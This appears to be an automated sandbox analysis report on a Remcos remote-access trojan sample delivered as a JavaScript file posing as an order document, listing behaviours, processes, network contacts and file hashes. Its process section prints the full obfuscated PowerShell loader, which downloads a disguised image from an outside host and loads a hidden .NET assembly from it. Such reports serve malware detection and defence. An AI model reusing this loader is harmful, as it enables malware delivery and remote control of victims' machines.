Analysis Overview
SHA256
476ccf639c26a23322184963067c8deadc73a4a6aedc518fd1dc9aef4d583f95
Threat Level: Known bad
The file 476ccf639c26a23322184963067c8deadc73a4a6aedc518fd1dc9aef4d583f95 was found to be: Known bad.
Malicious Activity Summary
Remcos
Blocklisted process makes network request
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Script User-Agent
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-08 04:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-08 04:26
Reported
2023-12-08 04:29
Platform
win7-20231130-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
|---|---|---|---|
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2940 wrote to memory of 2568 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2940 wrote to memory of 2568 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2940 wrote to memory of 2568 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2568 wrote to memory of 2712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2568 wrote to memory of 2712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2568 wrote to memory of 2712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚Dg♛♚Mw♛♚v♛♚DE♛♚OQ♛♚2♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚Z♛♚Bs♛♚Gw♛♚XwBq♛♚HM♛♚LgBq♛♚H♛♚♛♚Zw♛♚/♛♚DE♛♚Nw♛♚w♛♚DE♛♚O♛♚♛♚y♛♚DE♛♚O♛♚♛♚z♛♚DU♛♚Jw♛♚7♛♚CQ♛♚dwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚TgBl♛♚Hc♛♚LQBP♛♚GI♛♚agBl♛♚GM♛♚d♛♚♛♚g♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚TgBl♛♚HQ♛♚LgBX♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C4♛♚R♛♚Bv♛♚Hc♛♚bgBs♛♚G8♛♚YQBk♛♚EQ♛♚YQB0♛♚GE♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBV♛♚HI♛♚b♛♚♛♚p♛♚Ds♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚EU♛♚bgBj♛♚G8♛♚Z♛♚Bp♛♚G4♛♚ZwBd♛♚Do♛♚OgBV♛♚FQ♛♚Rg♛♚4♛♚C4♛♚RwBl♛♚HQ♛♚UwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBT♛♚FQ♛♚QQBS♛♚FQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBF♛♚E4♛♚R♛♚♛♚+♛♚D4♛♚Jw♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚KQ♛♚7♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚TwBm♛♚Cg♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚ZQ♛♚g♛♚D♛♚♛♚I♛♚♛♚t♛♚GE♛♚bgBk♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚d♛♚♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚Cs♛♚PQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚LgBM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚C♛♚♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚Ds♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚C♛♚♛♚PQ♛♚g
♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBT♛♚HU♛♚YgBz♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚s♛♚C♛♚♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚p♛♚Ds♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚QwBv♛♚G4♛♚dgBl♛♚HI♛♚d♛♚Bd♛♚Do♛♚OgBG♛♚HI♛♚bwBt♛♚EI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚Ck♛♚Ow♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚UgBl♛♚GY♛♚b♛♚Bl♛♚GM♛♚d♛♚Bp♛♚G8♛♚bg♛♚u♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQBd♛♚Do♛♚OgBM♛♚G8♛♚YQBk♛♚Cg♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚p♛♚Ds♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚b♛♚Bv♛♚GE♛♚Z♛♚Bl♛♚GQ♛♚QQBz♛♚HM♛♚ZQBt♛♚GI♛♚b♛♚B5♛♚C4♛♚RwBl♛♚HQ♛♚V♛♚B5♛♚H♛♚♛♚ZQ♛♚o♛♚Cc♛♚QwBs♛♚GE♛♚cwBz♛♚Ew♛♚aQBi♛♚HI♛♚YQBy♛♚Hk♛♚Mw♛♚u♛♚EM♛♚b♛♚Bh♛♚HM♛♚cw♛♚x♛♚Cc♛♚KQ♛♚7♛♚CQ♛♚bQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C4♛♚RwBl♛♚HQ♛♚TQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚K♛♚♛♚n♛♚FI♛♚dQBu♛♚Cc♛♚KQ♛♚u♛♚Ek♛♚bgB2♛♚G8♛♚awBl♛♚Cg♛♚J♛♚Bu♛♚HU♛♚b♛♚Bs♛♚Cw♛♚I♛♚Bb♛♚G8♛♚YgBq♛♚GU♛♚YwB0♛♚Fs♛♚XQBd♛♚C♛♚♛♚K♛♚♛♚n♛♚GQ♛♚S♛♚Bo♛♚D♛♚♛♚T♛♚Br♛♚E4♛♚TgBV♛♚Gk♛♚OQBu♛♚GM♛♚bgBj♛♚HY♛♚TwBD♛♚DQ♛♚egBO♛♚EM♛♚N♛♚♛♚0♛♚E0♛♚agBJ♛♚HU♛♚TgBq♛♚Fk♛♚dgBM♛♚Ho♛♚c♛♚B3♛♚GQ♛♚S♛♚BS♛♚G8♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZgBk♛♚GY♛♚Z♛♚♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bh♛♚GQ♛♚cwBh♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GU♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GM♛♚dQ♛♚n♛♚Ck♛♚KQ♛♚=';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0LkNNUi9ncncvOC4zNC44MjIuNjYvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 172.67.187.200:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 104.21.45.138:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
Files
memory/2568-18-0x000000001B710000-0x000000001B9F2000-memory.dmp
memory/2568-19-0x00000000021D0000-0x00000000021D8000-memory.dmp
memory/2568-20-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2568-21-0x0000000002200000-0x0000000002280000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | aba4eb063a707d691f8c75c62243e615 |
| SHA1 | 6731d5a587b9d5ff7de2a1b168be27da7a21348d |
| SHA256 | dc366bdef846b1240efa211b036acc8b96c9df2b69596fb8d6ab5e8432008c1a |
| SHA512 | 70b16dd91322cd742fa8dcd543d3582c83ff71dbf5b3243b069d8f0f0ec59cef26f3e67209d6e36f260479ff7ad24ac9a522a1bbb41f72e79b80cc44aed302fc |
memory/2568-22-0x0000000002200000-0x0000000002280000-memory.dmp
memory/2568-28-0x0000000002200000-0x0000000002280000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CYBBDJZ73VHGL3XUCA4E.temp
| MD5 | aba4eb063a707d691f8c75c62243e615 |
| SHA1 | 6731d5a587b9d5ff7de2a1b168be27da7a21348d |
| SHA256 | dc366bdef846b1240efa211b036acc8b96c9df2b69596fb8d6ab5e8432008c1a |
| SHA512 | 70b16dd91322cd742fa8dcd543d3582c83ff71dbf5b3243b069d8f0f0ec59cef26f3e67209d6e36f260479ff7ad24ac9a522a1bbb41f72e79b80cc44aed302fc |
memory/2712-29-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2712-30-0x00000000029D0000-0x0000000002A50000-memory.dmp
memory/2712-31-0x00000000029D0000-0x0000000002A50000-memory.dmp
memory/2568-32-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2712-33-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2712-34-0x00000000029D0000-0x0000000002A50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab1130.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b1529796de9598023510a36334ef1147 |
| SHA1 | 7de26a18848dd6cd4d3a5e8bc3672a1375b0c9e5 |
| SHA256 | 8e22c9d226a3b50a668e73f906e5477dc3f8b35e7683997b3143d4d5d17b35c0 |
| SHA512 | 2f28969f68ac5623d4becf5c81e53f385266df25d0a5b1f4a548631e37b2786b2edcb96f607a9d931ab3cd0dfd7745e7783430a27348809f79b58c145f241868 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | cca981a13aca69f997066820eeca8ea9 |
| SHA1 | 4321c495e20ddce52a1025f0a063d73e9d76eba4 |
| SHA256 | 7f93db5251ea461433650d3baf1068b4b18946f1086621b06f62b4287a982779 |
| SHA512 | 968df4b4c6ef6da04afb65d20045d8a3a2b001fbef7df33601b312421030771cd628ce6cc287cbc5cb4cee426c196f934927dd8a78fe3ecd792a11f5c5b48280 |
C:\Users\Admin\AppData\Local\Temp\Tar1133.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0eca7d4a6954c268072754da3b19b4d8 |
| SHA1 | 290f048633eee6f1d304e8a75013ab58b0d0ffd8 |
| SHA256 | b3436bd9676f0cb52fb3aae5365b06830a8a254c1f3979415863f5b70ac5e71c |
| SHA512 | 3c7736dda0f7ccef7769af310e4f993ddb1d81b7356ecfe7f88ed1801621501f1c41484287100894aefa7259df9553003fd4a8178162a3f6daf9718865ac06ee |
memory/2712-100-0x0000000002CC0000-0x0000000002CCA000-memory.dmp
memory/2712-101-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2568-102-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-08 04:26
Reported
2023-12-08 04:29
Platform
win10v2004-20231127-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 4576 set thread context of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
|---|---|---|---|
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚Dg♛♚Mw♛♚v♛♚DE♛♚OQ♛♚2♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚Z♛♚Bs♛♚Gw♛♚XwBq♛♚HM♛♚LgBq♛♚H♛♚♛♚Zw♛♚/♛♚DE♛♚Nw♛♚w♛♚DE♛♚O♛♚♛♚y♛♚DE♛♚O♛♚♛♚z♛♚DU♛♚Jw♛♚7♛♚CQ♛♚dwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚TgBl♛♚Hc♛♚LQBP♛♚GI♛♚agBl♛♚GM♛♚d♛♚♛♚g♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚TgBl♛♚HQ♛♚LgBX♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C4♛♚R♛♚Bv♛♚Hc♛♚bgBs♛♚G8♛♚YQBk♛♚EQ♛♚YQB0♛♚GE♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBV♛♚HI♛♚b♛♚♛♚p♛♚Ds♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚EU♛♚bgBj♛♚G8♛♚Z♛♚Bp♛♚G4♛♚ZwBd♛♚Do♛♚OgBV♛♚FQ♛♚Rg♛♚4♛♚C4♛♚RwBl♛♚HQ♛♚UwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBT♛♚FQ♛♚QQBS♛♚FQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBF♛♚E4♛♚R♛♚♛♚+♛♚D4♛♚Jw♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚KQ♛♚7♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚TwBm♛♚Cg♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚ZQ♛♚g♛♚D♛♚♛♚I♛♚♛♚t♛♚GE♛♚bgBk♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚d♛♚♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚Cs♛♚PQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚LgBM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛